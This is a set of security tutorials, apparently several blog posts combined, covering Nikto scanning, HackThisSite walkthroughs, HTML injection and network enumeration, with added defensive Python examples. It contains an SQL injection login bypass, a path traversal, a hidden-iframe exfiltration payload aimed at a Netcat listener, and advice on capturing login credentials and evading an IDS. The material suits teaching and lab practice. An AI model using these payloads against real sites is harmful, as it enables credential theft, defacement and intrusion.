Nikto Vulnerability Scanner


Nikto is a web server vulnerability assessment tool. It is useful for finding default and insecure files,
configurations and programs on any type of web server. This Nikto tutorial walks through all the common types of scan in Nikto.


Installation 


Nikto comes preinstalled in Kali Linux. If it is missing, install it with:


apt install nikto 

On Windows, check this guide.

On other operating systems, use your system's package manager or get it from GitHub here.

Operation

To start, let's see what Nikto offers with a simple command:

nikto -h

(image: Nikto help)


To see the full list of options, type:

nikto -H


Now we are going to look at the important commands used in Nikto.
First, to scan web servers and websites with Nikto we use the -host option:


nikto -host <host URL or IP address>

In my case I'm using an internal lighttpd web server to test:


nikto -host localhost:8001

Scan result


Here you can see that Nikto found XSS, an outdated server version and other vulnerabilities on the web server.

Nikto needs a port to scan through; if none is specified, Nikto uses port 80 as the default.

Scanning specified ports in nikto


In Nikto we can specify the port to scan with the -p (-port) option.


nikto -host 127.0.0.1 -p 443
Here we are scanning port 443 explicitly.

Scanning multiple ports in nikto 


nikto -host 127.0.0.1 -p 80,84,443

Here we have specified multiple ports for the scan, separated by commas.

Using a Proxy in a Nikto Scan


To set a proxy on the command line, use the -useproxy option with the proxy as its argument:

nikto -host 127.0.0.1 -useproxy <proxy address:port>


When using Nikto, I really recommend using a proxy because, as you can see in the previous image, Nikto sent over 7000 requests to the web server, which is very noisy. An IDS will block your IP once it analyses all these requests coming from a single IP.
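Because Nikto is this noisy, the scan is easy to spot on the server side. The following added example (my own, not part of the tutorial or of Nikto) runs a simple detector over a few constructed Apache-style access log lines: it flags a client whose User-Agent carries Nikto's default "Nikto/<version>" token, and separately a client that sends a burst of requests that mostly end in 404, so a changed User-Agent alone does not hide the scan. The IPs, paths, timestamps and thresholds are made up.

```python
"""Spot a Nikto-style scan in web server access logs (added example, not from the tutorial)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in Apache "combined" format. 198.51.100.9 keeps Nikto's default
# User-Agent; 192.0.2.77 uses a generic one but still probes in a burst.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [10/Mar/2021:12:00:09 +0000] "GET /about.html HTTP/1.1" 200 901 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [10/Mar/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)"
198.51.100.9 - - [10/Mar/2021:12:00:01 +0000] "GET /cgi-bin/ HTTP/1.1" 404 345 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
198.51.100.9 - - [10/Mar/2021:12:00:02 +0000] "GET /admin/ HTTP/1.1" 404 345 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)"
198.51.100.9 - - [10/Mar/2021:12:00:02 +0000] "GET /backup/ HTTP/1.1" 404 345 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000003)"
198.51.100.9 - - [10/Mar/2021:12:00:03 +0000] "GET /phpinfo.php HTTP/1.1" 404 345 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000004)"
198.51.100.9 - - [10/Mar/2021:12:00:04 +0000] "GET /test/ HTTP/1.1" 404 345 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000005)"
192.0.2.77 - - [10/Mar/2021:12:05:00 +0000] "GET / HTTP/1.1" 200 612 "-" "curl/7.68.0"
192.0.2.77 - - [10/Mar/2021:12:05:01 +0000] "GET /admin.php HTTP/1.1" 404 345 "-" "curl/7.68.0"
192.0.2.77 - - [10/Mar/2021:12:05:02 +0000] "GET /login/ HTTP/1.1" 404 345 "-" "curl/7.68.0"
192.0.2.77 - - [10/Mar/2021:12:05:03 +0000] "GET /config.php HTTP/1.1" 404 345 "-" "curl/7.68.0"
192.0.2.77 - - [10/Mar/2021:12:05:04 +0000] "GET /old/ HTTP/1.1" 404 345 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyse(log_text, min_requests=5, max_window_seconds=60, min_404_ratio=0.5):
    """Return {client_ip: [reasons]} for clients that look like a scanner."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        reasons = []
        # 1. Nikto's default User-Agent announces itself.
        if any("nikto" in r["ua"].lower() for r in recs):
            reasons.append("user-agent contains 'Nikto'")
        # 2. A burst of requests in a short window (thresholds are made up).
        if len(recs) >= min_requests:
            span = (max(r["ts"] for r in recs) - min(r["ts"] for r in recs)).total_seconds()
            if span <= max_window_seconds:
                reasons.append(f"{len(recs)} requests in {int(span)}s")
            # 3. Probing for files that do not exist produces mostly 404s.
            ratio = sum(r["status"] == 404 for r in recs) / len(recs)
            if ratio >= min_404_ratio:
                reasons.append(f"{ratio:.0%} of responses were 404")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

The three signals are deliberately independent: a scan run through a proxy or with a custom User-Agent loses signal 1 but still trips signals 2 and 3, which is why rate-based rules are the ones worth keeping in an IDS.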

Mutations in Nikto



Mutation technique: a mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the referenced number to specify the type; multiple may be used:

   1  Test all files with all root directories
   2  Guess for password file names
   3  Enumerate user names via Apache (/~user type requests)
   4  Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
   5  Attempt to brute force sub-domain names, assume that the hostname is the parent domain
   6  Attempt to guess directory names from the supplied dictionary file

(image: Using mutations in Nikto)




The -mutate-options option provides extra information for a mutation, for example a dictionary file.

Output file in nikto

We can use the -o (-output) option to write Nikto's output to a file. The available formats are:


  -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               json  JSON Format
                               htm   HTML Format
                               nbe   Nessus NBE format
                               sql   Generic SQL (see docs for schema)
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)


nikto -host <Hostname/IP> -output <filename>
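Once a scan is written to a file, the report can be triaged with a script instead of by eye. The following added example (my own, not part of the tutorial or of Nikto) reads a CSV report, counts findings per host and port, and buckets them by keyword. It assumes each row carries the columns host, ip, port, id, method, uri and message with no header line; check the CSV plugin of your Nikto version and adjust COLUMNS if yours differs. The report rows below are constructed.

```python
"""Triage a Nikto CSV report (added example; not the tutorial's or Nikto's own code)."""
import csv
import io
from collections import Counter

# Assumed column order of the CSV report (verify against your Nikto version).
COLUMNS = ["host", "ip", "port", "id", "method", "uri", "message"]

# Constructed sample rows in that layout; the messages mimic Nikto's style but are made up.
SAMPLE_CSV = '''"localhost","127.0.0.1","8001","","GET","/","The anti-clickjacking X-Frame-Options header is not present."
"localhost","127.0.0.1","8001","","GET","/","The X-XSS-Protection header is not defined."
"localhost","127.0.0.1","8001","","GET","/","lighttpd/1.4.35 appears to be outdated."
"localhost","127.0.0.1","8001","","GET","/test/","Directory indexing found."
"localhost","127.0.0.1","443","","GET","/","The X-XSS-Protection header is not defined."
'''

# Keyword buckets used to rank findings; these are this example's own choices.
KEYWORDS = {
    "high": ("outdated", "directory indexing", "backup"),
    "medium": ("x-frame-options", "xss"),
}


def parse_report(text):
    """Return one dict per finding; rows with an unexpected column count are skipped."""
    rows = []
    for rec in csv.reader(io.StringIO(text)):
        if len(rec) != len(COLUMNS):
            continue
        rows.append(dict(zip(COLUMNS, rec)))
    return rows


def severity(message):
    """Bucket a finding by the first keyword group that matches its message."""
    text = message.lower()
    for level, words in KEYWORDS.items():
        if any(w in text for w in words):
            return level
    return "info"


def summarise(rows):
    """Return (findings per (host, port), findings per severity bucket)."""
    by_target = Counter((r["host"], r["port"]) for r in rows)
    by_severity = Counter(severity(r["message"]) for r in rows)
    return by_target, by_severity


if __name__ == "__main__":
    targets, levels = summarise(parse_report(SAMPLE_CSV))
    print(dict(targets))
    print(dict(levels))
```

For a real run, replace SAMPLE_CSV with the contents of the file passed to -output; the same structure works for the txt and json formats once the row parser is swapped.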

Hack This Site | Info, Walkthrough and Review



HackThisSite.org, commonly referred to as HTS, is an online hacking and security site founded by Jeremy Hammond. The site has been maintained by members of the community since his departure.
It aims to give users a way to learn and practise basic and advanced "hacking" skills through a series of challenges in a safe and legal environment.

In short, you can learn and demonstrate basic to advanced hacking skills on Hack This Site.

So, without wasting time, let's dive into Hackthissite.org.

The first thing you need to do is register on the site; it is simple and easy.


A few features of HTS:

1) Real-time hacking scenarios.
2) Many articles and feeds on recent technologies, programming languages, exploits and tutorials.
3) An excellent forum with topics ranging from the basics to the most sophisticated material you'll find on the web, including cryptography, mathematics, design, human psychology and far more.
4) A great collection of warez used for private and hosted challenges.
5) The HackThisSite IRC, where you'll meet some of the most talented people on the web.
6) Last but not least, the basic challenges, realistic challenges, JavaScript challenges and all the others, which are the core of HTS and have kept it interesting since 2005.

Here is the list of challenges available:

(image: Hackthissite Challenges)

Here we are going to solve some of the challenges, for better understanding and for fun.

Hack This Site Basic mission 1 

In this simple challenge, our HTML skills come in handy: just inspect the page, find the login form, and you can see the password there.

(image: Hack This Site Basic mission 1)



As you can see, the password is saved right in the HTML. Easy, right?
But the difficulty level increases with every challenge, and they become harder to complete.

Moving on to the next challenge.


Hack This Site Basic mission 2


Network Security Sam set up a password protection script. He made it load the real password from an unencrypted text file and compare it to the password the user enters. However, he neglected to upload the password file...


This challenge really requires some thinking and common sense.

There is no password file uploaded to check whether the entered password is right or not, so any password you enter gives you "incorrect password".

The catch is that if we submit a blank password, the script has nothing to compare against and accepts it directly.
Just submit the blank field and it will show that you completed the challenge.
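To see why the blank field works, here is an added example (my own model, not the site's script) of the check the mission describes: the stored password is read from a file that does not exist, which yields an empty string, so only an empty entry compares equal. The fixed version fails closed when either value is empty and compares in constant time. The function names and file path are invented for the example.

```python
"""Model of Basic mission 2's password check and a fixed version (added example)."""
import hmac
import os
import tempfile

# Constructed path that is never created: stands in for the password file Sam forgot to upload.
MISSING_FILE = os.path.join(tempfile.gettempdir(), "hts-example-password-never-uploaded.txt")


def load_stored_password(path):
    """Read the stored password; a missing file silently becomes an empty string."""
    try:
        with open(path, encoding="utf-8") as f:
            return f.read().strip()
    except FileNotFoundError:
        return ""  # the bug: "no file" is indistinguishable from "empty password"


def check_vulnerable(entered, path=MISSING_FILE):
    # Plain comparison, so "" == "" passes when the file is absent.
    return entered == load_stored_password(path)


def check_fixed(entered, path=MISSING_FILE):
    """Fail closed: refuse when either side is empty, then compare in constant time."""
    stored = load_stored_password(path)
    if not stored or not entered:
        return False
    return hmac.compare_digest(entered.encode("utf-8"), stored.encode("utf-8"))


def demo_with_real_file(entered, stored="correct horse"):
    """Create a temporary password file so both checks can be tried with a file present."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt", encoding="utf-8") as f:
        f.write(stored + "\n")
        path = f.name
    try:
        return check_vulnerable(entered, path), check_fixed(entered, path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("blank password, file missing:", check_vulnerable(""), check_fixed(""))
    print("blank password, file present:", demo_with_real_file(""))
    print("right password, file present:", demo_with_real_file("correct horse"))
```

The lesson for the defender is the empty-string default: a lookup that cannot find its secret should raise or deny, never return a value that happens to equal a plausible user input.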


Hack this Site Basic mission 3


This time Network Security Sam remembered to upload the password file, but there were deeper problems than that


This time the password file is present; we just need to find it. To do that we inspect the site's source and look for the password file.


(image: Hackthissite basic mission 3)

After searching for some time I found the file password.php referenced there.

We just need to open that file by adding it to the URL.

(image: Hackthissite basic mission 3, password.php)

As you can see, after hitting enter the password is shown directly. Copy it, paste it into the password field, hit submit, and we have passed another challenge.

Hack this site basic mission 4

This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script:

This time our developer Sam made a script to send him the password by email.
We need to find his email address first, so inspect the element and look for an email address in the HTML tags.

(image: Hack this site basic mission 4)


After inspecting the HTML I found Sam's email address, which is sam@hackthissite.org.

We just need to change this email address to our own, so that the script sends the password to our address instead.

Now click on the script button named "send the password to sam" and this page will appear:

(image: Hack this site basic mission 4, password sent)

The password is sent to the email address we substituted. Open that email, copy the password, paste it into the password field, hit submit, and we have passed another challenge.


These are some of the basic challenges I wanted to show you; there are more to play with. Try to solve the rest on your own, and a smile will spread across your face after every challenge you pass.
Go ahead and take the challenges.


Realistic Challenges


Now we are going to look at some realistic challenges, which are really fun to solve and test your hacking skills.
There are lots of challenges there, but I will show you my two favourites.
Without wasting time, let's get into it.

Hack this site realistic mission 2

(image: Hack this site realistic mission 2)

First of all, don't be offended by this challenge: it is just a demo site, and nothing here represents the USA or Iran.

Our goal here is to take down this site.

First, we need to inspect the site to find any useful information to escalate further.
After inspecting it I found one juicy file, update.php.

(image: Hack this site realistic mission 2, update.php page)

By adding update.php to the URL I found a very interesting page.

Yes, we found a login page, but to gain access through it we need a username and password, right?

We can get past this login page with an old-school manual SQL injection attack.

To trigger a SQL error we need to find the right payload.

After some trial and error, I found that the login page gives an error on some POST-based union queries such as:

1=1--

(image: Hack this site realistic mission 2 login page)

After playing with it I got the payload ' or 1=1-- , which worked perfectly and gave us admin access.

Hence we completed the challenge.
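An added example (not the mission's code) of the flaw behind that payload, modelled with Python's built-in sqlite3: the vulnerable login pastes the username into the SQL text, so ' or 1=1-- rewrites the WHERE clause into a tautology and comments out the password check, while the fixed login binds parameters and treats the same input as a plain string. The table and accounts are constructed; passwords are stored in clear only to keep the model short.

```python
"""Login built by string concatenation versus parameter binding (added example)."""
import sqlite3


def make_db():
    """Constructed in-memory users table with two sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cret-admin", 1), ("guest", "guest", 0)],
    )
    return conn


def login_vulnerable(conn, username, password):
    """User input becomes SQL syntax: ' or 1=1-- matches every row and drops the password test."""
    query = (
        "SELECT username, is_admin FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()  # (username, is_admin) or None


def login_fixed(conn, username, password):
    """Parameters are bound by the driver, so the quote and comment stay inside the value."""
    return conn.execute(
        "SELECT username, is_admin FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("vulnerable:", login_vulnerable(db, payload, "anything"))
    print("fixed:     ", login_fixed(db, payload, "anything"))
```

The first query becomes `... WHERE username = '' or 1=1--' AND password = 'anything'`; everything after `--` is a comment, so the first row (the admin) is returned. The bound version asks the database for a user literally named `' or 1=1--` and gets nothing.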


Hack This Site Realistic mission 3

(image: Hack This Site Realistic mission 3)

In this realistic challenge we need to restore a poetry site that has been defaced.

After opening the defaced site we need to inspect it.

(image: Hack This Site Realistic mission 3, defaced page)

After inspecting the defaced page I found the green HTML text there,
which says the old site is still up and backed up at oldindex.html.
So we need to find it first.
To do that, append oldindex.html to the end of the URL and hit enter.

(image: Hack This Site Realistic mission 3, oldindex.html)
Here we can see that the poetry site is still running in the background.
Now we need to put this page back at index.html by submitting its source code.
The catch is that we must use our path traversal knowledge to place the file in the correct directory,
which means we need to submit it one directory up so that it shows up as the index page.
To do that, first copy the source code of the poetry site and click on "submit a poem".


(image: Hack This Site Realistic mission 3, submit a poem)

In the poem name field we add the directory path, which is ../index.html,
paste the source code into the poem box and add the poem.
After this the poem is written to index.html, which is the home page, and the defaced page is replaced automatically.

Hence the challenge is completed: respect+.
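The same traversal, as an added example (mine, not the site's) in Python: the vulnerable saver joins the poem name onto the poems directory without checking it, so ../index.html lands one level up and replaces the home page; the hardened saver resolves the final path and rejects anything outside the directory. The directory layout and names are constructed, and the demo builds a throwaway site in a temporary directory.

```python
"""Poem upload with and without a path-traversal check (added example)."""
import os
import shutil
import tempfile


def save_poem_vulnerable(root, name, body):
    """Trusts the poem name completely, so '../' walks out of poems/."""
    path = os.path.join(root, "poems", name)
    with open(path, "w", encoding="utf-8") as f:
        f.write(body)
    return path


def save_poem_fixed(root, name, body):
    """Resolve the final path and refuse anything that is not inside poems/."""
    poems_dir = os.path.realpath(os.path.join(root, "poems"))
    path = os.path.realpath(os.path.join(poems_dir, name))
    if os.path.commonpath([poems_dir, path]) != poems_dir:
        raise ValueError(f"refusing to write outside poems/: {name!r}")
    with open(path, "w", encoding="utf-8") as f:
        f.write(body)
    return path


def demo(name, body="<p>restored poem page</p>"):
    """Build a constructed site (index.html + poems/), try both savers, report the effect."""
    root = tempfile.mkdtemp()
    try:
        os.mkdir(os.path.join(root, "poems"))
        index = os.path.join(root, "index.html")

        def reset_index():
            with open(index, "w", encoding="utf-8") as f:
                f.write("DEFACED")

        reset_index()
        save_poem_vulnerable(root, name, body)
        with open(index, encoding="utf-8") as f:
            vulnerable_overwrote = f.read() == body

        reset_index()
        try:
            save_poem_fixed(root, name, body)
            fixed_rejected = False
        except ValueError:
            fixed_rejected = True
        return {"vulnerable_overwrote_index": vulnerable_overwrote, "fixed_rejected": fixed_rejected}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print("../index.html ->", demo("../index.html"))
    print("spring.html   ->", demo("spring.html"))
```

Checking the resolved path with commonpath, rather than filtering the string for "..", also catches encoded and symlinked variants that a blocklist would miss.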


I had a lot of fun solving the realistic challenges; you must try them.
HTML Injection tutorial


HTML Injection


To understand what HTML injection is, we first need to know what HTML is.

HTML is HyperText Markup Language. It is mostly used for building websites. Web pages are sent to the browser as HTML documents, and the browser then renders those documents into the normal pages shown to end users.

In this tutorial we will learn how to perform HTML injection in practice.

What is HTML Injection?

The essence of this kind of injection attack is injecting HTML code through the vulnerable parts of a site. The malicious user sends HTML code through any vulnerable field with the aim of changing the page layout or any information that is shown to the user.
We are going to look at the types of HTML injection and how each is done.

Types of HTML Injections

  • Reflected HTML Injection
  • Stored HTML Injection

Reflected HTML Injection


A reflected injection attack can be performed differently depending on the HTTP method, i.e. GET or POST. As a reminder, with the POST method data is sent to the server, and with the GET method data is requested.
To find out which method is used by a given element of the website, we can check the page source.

Reflected HTML Injection (GET)

Reflected GET injection occurs when our input is displayed (reflected) on the website. Suppose we have a simple page with a search form that is vulnerable to this attack. If we type any HTML code into it, the code appears on the page and is injected into the HTML document at that moment.

As you can see in the image below:


(image: Reflected GET injection)

When we typed the HTML tag <h1>html injection</h1> into the search form it was reflected on the page, which means this site is vulnerable to HTML injection.

To test whether a site is vulnerable, any HTML tag that gets displayed will do.


Reflected HTML Injection (POST)

Reflected POST injection occurs when malicious HTML code is sent in place of the correct POST method parameters.

It is harder to exploit than the GET variant because the POST request is sent by the site to the server, so sometimes we need Tamper Data (a Firefox add-on) to craft the POST request and send it to the server.

(image: Reflected POST Injection)



In the image above the simple HTML snippet <h1>Hacking Castle</h1> is displayed on the page, but it was sent to the server by the POST method because it is not a parameter defined in the URL.
We will see how to use Tamper Data in the next type.



Reflected HTML Injection ( URL )

Reflected URL injection happens when HTML code is sent through the website URL, displayed on the website and at the same time injected into the website's HTML document.

This time we will use Tamper Data to craft the URL and send it to the server; this URL will then be shown to other people visiting the same page.

To do that, open Tamper Data, change the URL there, and let the requests through until they reach the server, then stop it.


(image: Editing the URL in Tamper Data)




(image: Reflected URL)


As you can see in the image above, the link URL has changed to the request we crafted with Tamper Data.
This is stored in the page for other users too, so it can be escalated into many malicious actions to obtain user information,
which we are going to see in the next type of HTML injection.



Stored HTML Injection

A stored injection attack occurs when malicious HTML code is saved on the web server and is executed every time a user calls the affected functionality.

(image: Stored HTML Injection)


This page contains a submit form that stores the user's input and lists it below. If the input is not treated as plain data, an HTML tag will be injected, and the page is vulnerable to HTML injection.

We will use the HTML tag

     <h1>Hacking Castle</h1>

to see whether it is vulnerable or not.

(image: vulnerable to stored HTML Injection)

As we can see, this HTML tag is stored in the page.

Let's look at another example. This time we will use <script>alert("Hacking Castle");</script>
This JavaScript code makes the page show an alert popup.

(image: popup)

In the image above we can see that it popped up on the page, and it is also stored in the form, which means that whenever someone opens or refreshes that page the popup appears.

That is the difference between reflected and stored HTML injection.

That covers stored HTML injection. Now we are going to see how it can be escalated further to steal user information.


Stealing user Information using HTML Injection

Here we are going to use an iframe tag and a Netcat listener to obtain useful information.
First, we will use this iframe tag:

<iframe src="http://(IP:port)/test" height="0" width="0"></iframe>

Before hitting submit, open a Netcat session in a terminal with the command:

nc -nvlp (port)

This starts the listener. Now hit submit, and we will receive the request details of anyone who opens that page.

(image: getting user credentials using HTML Injection)
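An added example (my own, not the tutorial's) that models the reflected search page and the stored form above as small Python rendering functions, each in a vulnerable and a fixed variant. The payloads are the ones used in this tutorial; the templates are constructed and the iframe address is a placeholder. The fix is the same for the reflected, stored and iframe cases: escape user text at the moment it is written into HTML, so < and " become &lt; and &quot; and the browser shows the text instead of interpreting it.

```python
"""Reflected and stored HTML injection, vulnerable and escaped rendering (added example)."""
import html

# Constructed page fragments standing in for the search page and the guestbook.
SEARCH_TEMPLATE = "<p>You searched for: {term}</p>"
GUESTBOOK_TEMPLATE = "<ul>{entries}</ul>"


def render_search_vulnerable(term):
    """Reflected: the query string is pasted straight into the page."""
    return SEARCH_TEMPLATE.format(term=term)


def render_search_fixed(term):
    """Reflected, fixed: escape on output so tags become visible text."""
    return SEARCH_TEMPLATE.format(term=html.escape(term, quote=True))


class Guestbook:
    """Stored variant: entries persist and are rendered for every later visitor."""

    def __init__(self, escape_output):
        self.entries = []
        self.escape_output = escape_output

    def add(self, text):
        self.entries.append(text)  # stored as typed; the decision is made at render time

    def render(self):
        items = "".join(
            "<li>{}</li>".format(html.escape(e, quote=True) if self.escape_output else e)
            for e in self.entries
        )
        return GUESTBOOK_TEMPLATE.format(entries=items)


def contains_markup(rendered):
    """Crude check used by the demo: did user input survive as a real tag?"""
    return any(tag in rendered for tag in ("<h1>", "<script>", "<iframe"))


if __name__ == "__main__":
    payloads = [
        "<h1>html injection</h1>",
        '<script>alert("Hacking Castle");</script>',
        '<iframe src="http://LISTENER_IP:PORT/test" height="0" width="0"></iframe>',
    ]
    for escape in (False, True):
        book = Guestbook(escape_output=escape)
        for p in payloads:
            book.add(p)
        print("escaped" if escape else "raw", "->", book.render())
```

Escaping on output rather than on input is the choice that scales: the stored text stays intact for editing or searching, and every rendering path applies the same rule. A Content-Security-Policy that restricts frame-src and script-src is a useful second layer against the iframe and script cases, but it does not replace escaping.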


More ideas to play with:

  • HTML is a very good language to play with. We can build an HTML login page that posts to a Netcat listener to capture users' login credentials.

  • There is plenty of HTML that can be used to deface a site if it is vulnerable.

I leave these for you to play with and have fun.

This cheat sheet will help you with that: Cheat sheet


Conclusion


It is noticeable that there is considerably less literature and information about HTML injection, so testers may decide not to perform this kind of testing. In that case, however, the risk of HTML attacks may not be assessed well enough.

As we have seen in this tutorial, with this kind of injection the whole design of your site can be destroyed, or even users' login details may be stolen. It is therefore strongly recommended to include HTML injection in security testing and to build good knowledge of it.


That's all about HTML injection.


Happy Hacking


Enumeration | ethical hacking enumeration techniques


Enumeration


Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system.

In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.

The gathered information is used to identify vulnerabilities or weak points in system security, which the attacker then tries to exploit in the system-gaining phase.


Types of information enumerated by an attacker: 

  • Network Resource and shares
  • Users and Groups
  • Routing tables
  • Auditing and Service settings
  • Machine names
  • Applications and banners
  • SNMP and DNS details 


Services and Ports to Enumerate:

TCP 53: DNS Zone Transfer:

DNS zone transfer uses TCP port 53 rather than UDP 53. The TCP protocol helps to maintain a consistent DNS database between DNS servers, and DNS servers always use TCP for zone transfers.


TCP 137: NetBIOS Name Service (NBNS):

NBNS, also referred to as Windows Internet Name Service (WINS), maintains a database of the NetBIOS names of hosts and the corresponding IP address each host is using.

UDP 161: Simple Network Management Protocol (SNMP):

The SNMP protocol is used by various devices and applications, including firewalls and routers, to exchange logging and management information with a remote monitoring application.

TCP/UDP 389: Lightweight Directory Access Protocol (LDAP):

The LDAP Internet protocol is used by Microsoft Active Directory, and also by some email programs, to look up contact information on a server.

TCP 25: Simple Mail Transfer Protocol (SMTP):

SMTP allows email to move across the Internet and across a local network. It runs on the connection-oriented service provided by the Transmission Control Protocol (TCP) and uses port 25.

We will look at each of these services, how to get information out of them, and how to find vulnerabilities and exploits.

(image: Enumeration in Hacking)

1) DNS Enumeration


DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration can yield usernames, computer names and IP addresses of potential target systems. The list of DNS records gives an overview of the types of resource records (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical and redundant database for information associated with Internet domain names and addresses.

There are lots of tools for DNS enumeration, but today I will show you my personal favourites.

  • dnsenum

(image: DNS subdomain brute-forcing with dnsenum)

(image: DNS enumeration using dnsenum)


  • dnsrecon

(image: dnsrecon)


Countermeasures: 

  1. Disable zone transfers to untrusted hosts.
  2. Ensure that private hostnames are not mapped to IP addresses in the zone files of publicly accessible DNS servers.
  3. Use premium registration services.
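To verify the first countermeasure against your own name servers, here is an added example (mine, not from this post or from dnsenum/dnsrecon) that speaks the DNS wire format directly with the standard library: it builds an AXFR question, sends it over TCP 53 with the two-byte length prefix TCP DNS requires, and classifies the reply from its header. RCODE 0 with answer records means the zone was handed out; REFUSED or NOTAUTH means the server declined. The two replies at the bottom are constructed so the parsing runs offline; the zone name is a placeholder.

```python
"""Check whether a name server answers AXFR, using raw DNS messages (added example)."""
import socket
import struct

QTYPE_AXFR = 252
QCLASS_IN = 1
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
          4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}


def encode_name(name):
    """'example.com' -> b'\\x07example\\x03com\\x00' (length-prefixed labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    """Header (ID, flags=0: standard query, QDCOUNT=1) followed by one AXFR question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, QCLASS_IN)
    return header + question


def parse_response_header(msg):
    """Pull the fields we need out of the 12-byte header."""
    if len(msg) < 12:
        raise ValueError("truncated DNS header")
    txid, flags, qdcount, ancount, _nscount, _arcount = struct.unpack("!HHHHHH", msg[:12])
    rcode = flags & 0x000F
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "rcode": RCODES.get(rcode, str(rcode)), "answers": ancount}


def classify(msg):
    h = parse_response_header(msg)
    if not h["is_response"]:
        return "not a response"
    if h["rcode"] == "NOERROR" and h["answers"] > 0:
        return "TRANSFER ALLOWED"
    return f"refused ({h['rcode']})"


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before the reply was complete")
        buf += chunk
    return buf


def check_axfr(server, zone, timeout=5.0):
    """Send the AXFR query to `server` over TCP 53 and classify its first reply message."""
    query = build_axfr_query(zone)
    with socket.create_connection((server, 53), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(query)) + query)  # TCP DNS: 2-byte length prefix
        (length,) = struct.unpack("!H", recv_exact(s, 2))
        return classify(recv_exact(s, length))


# Constructed replies (headers only) for offline demonstration.
REFUSED_REPLY = struct.pack("!HHHHHH", 0x1234, 0x8005, 1, 0, 0, 0)  # QR=1, RCODE=5
ALLOWED_REPLY = struct.pack("!HHHHHH", 0x1234, 0x8000, 1, 3, 0, 0)  # QR=1, 3 answers

if __name__ == "__main__":
    print("constructed refused reply:", classify(REFUSED_REPLY))
    print("constructed allowed reply:", classify(ALLOWED_REPLY))
    # Against your own infrastructure: print(check_axfr("ns1.example.com", "example.com"))
```

A server that is correctly restricted returns REFUSED here; an "allowed" result against a public name server means any client can download the whole zone, which is exactly what the dnsenum and dnsrecon screenshots above rely on.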


NetBIOS Enumeration

NetBIOS stands for Network Basic Input Output System. It allows computers to communicate over a LAN and enables them to share files and printers.




NetBIOS names are used to identify network devices over TCP/IP (Windows). A name must be unique on the network and is limited to 16 characters, of which 15 are used for the device name and the sixteenth is reserved to identify the type of service running or the name record type.



Attackers use the NetBIOS name list to obtain:

  • a list of computers that belong to a domain

  • a list of shares on the individual hosts on the network

  • policies and passwords

Tools for NetBIOS enumeration: nbtscan, nbtstat, and the all-in-one nmap.

In the image below, nmap's nbstat NSE script is used to enumerate NetBIOS.



(image: Nmap NetBIOS script)

How to prevent scanning of shared NetBIOS resources

Fortunately for administrators, there is a simple defence against unauthorized scanning of NetBIOS shared resources: disable NetBIOS itself.

There are situations where disabling it causes malfunctions, for instance when some obsolete application depends entirely on it, but in most cases those obsolete applications have already been replaced by more modern solutions, and disabling NetBIOS does no harm.

